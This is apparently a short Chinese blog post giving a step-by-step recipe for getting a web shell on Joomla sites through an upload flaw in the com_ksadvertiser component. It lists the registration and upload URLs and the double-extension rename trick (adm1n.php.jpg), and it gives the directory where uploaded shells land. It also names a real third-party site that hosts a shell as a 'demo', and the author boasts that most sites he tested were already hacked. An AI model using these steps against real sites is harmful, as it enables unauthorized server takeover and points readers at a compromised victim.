Joomla 远程上传漏洞.直接getshell

作者:1337

1.  有些joomal需要先注册.

http://site/index.php?option=com_user&view=login

2.  到上传地址

http://site/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en

3.  点击image后点击upload,选择shell, 将shell重名为adm1n.php.jpg格式.

4.  上传后的文件在 / images/ksadvertiser/U0 这个目录下.

http://site/images/ksadvertiser/U0/adm1n.php.gif

Demo: http://alt.kiss-software.de/images/ksadvertiser/U0/403.php.gif

我随便测试了一下, 基本都被搞了. 疯狂的人们啊, 这今天刚出的漏洞就成这样了… 1337V5啊.

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值